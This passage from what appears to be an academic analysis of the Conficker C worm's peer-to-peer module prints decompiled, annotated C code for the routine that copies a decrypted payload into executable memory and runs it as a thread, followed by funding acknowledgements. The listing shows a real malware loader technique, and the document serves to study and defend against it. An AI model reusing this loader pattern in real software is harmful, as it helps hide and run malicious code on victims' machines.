int spawn_payload_thread(void payload_size, int control, const void *decrypted_code,
                         int a4, int a5, int a6, int a7) {
  thread_parametrs *result;
  thread_parametrs *v8;
  unsigned int executable_payload_size_var;
  int i;
  char *v11;
  char v12;
  unsigned int v13;
  int v14;
  int v15;
  char v16;
  unsigned int v17;
  int v18;
  void *v19;
  const void *v20;
  char ThreadId;
  thread_parametrs *v22;
 
  executable_payload_size_var = (unsigned int)this;
  result = Global_alloc(0x20u);
  v8 = result;
  v22 = result;
  if ( result )
  {
      result->chunks = (executable_payload_size_var + 0xFFF) & 0xFFFFF000;
      result = VirtualAlloc(0, (executable_payload_size_var + 0xFFF) & 0xFFFFF000,
               0x3000u, 0x40u);
       v8->payload = (int)result;
       if (result ) {                  
           /* copy payload and peer info to a data structure passed at a parameter to
              the spawned thread */
           v12 = v8->chunks;
           v13 = (unsigned int)v8->elem2 >> 2;
           memset(result, 0, 4 * v13);
           v11 = (char *)result + 4 * v13;
           for ( i = v12 & 3; i; --i )  *v11++ = 0;
           v16 = executable_payload_size_var;
           v17 = executable_payload_size_var >> 2;
           v18 = v8->payload;
           memcpy((void *)v8->payload, decrypted_code, 4 *
                  (executable_payload_size_var >> 2));
           v20 = (char *)decrypted_code + 4 * (executable_payload_size_var >> 2);
           v19 = (void *)(v18 + 4 * v17);
           memcpy(v19, v20, v16 & 3);
           v15 = (int)((char *)v20 + (v16 & 3));
           v14 = (int)((char *)v19 + (v16 & 3));
           v8->array_APIs = **(_DWORD **)dword_9BCB74;
           v8->GEtProcAddress = *(_DWORD *)(*(_DWORD *)dword_9BCB74 + 8);
           /* pass to the thread the address of the array containing the
              obfuscated APIs used in the obfuscated Conficker C P2P code
              and a pointer to GetProcAddress to load more APIs if needed */
           v8->decrypted_payload = a4;
           v8->port = a5;
           v8->a4 = a6;
           v8->a5 = a7;
           if ( control )
           /* in Conficker C this argument is always equal to 1 */
           {
                /* create a thread at the address of the begining of the
                   decrypted payload */
                result = CreateThread(0, 0,decrypted_code , v8, 0,
                         (LPDWORD)&ThreadId);
                if ( result ) 
                    if ( result != -1 )  result = CloseHandle(result);
           }
           else  {
               /* call the payload as a function using the call instruction */
                result = call_arg(a5, a7, (int)v8, v14, v15, (int)v8);
       }
    }
  }
  return result;
}


SOURCE LISTING 18: Spawning payloads as threads



 


 







Acknowledements

  This material is based upon work supported through the U.S. Army Research Office under the Cyber-TA Research Grant No. W911NF-06-1- 0316 and by the National Science Foundation, Grant No. CNS-07-16 612. The views expressed in this document are those of the authors and do not necessarily represent the official position of the sponsors.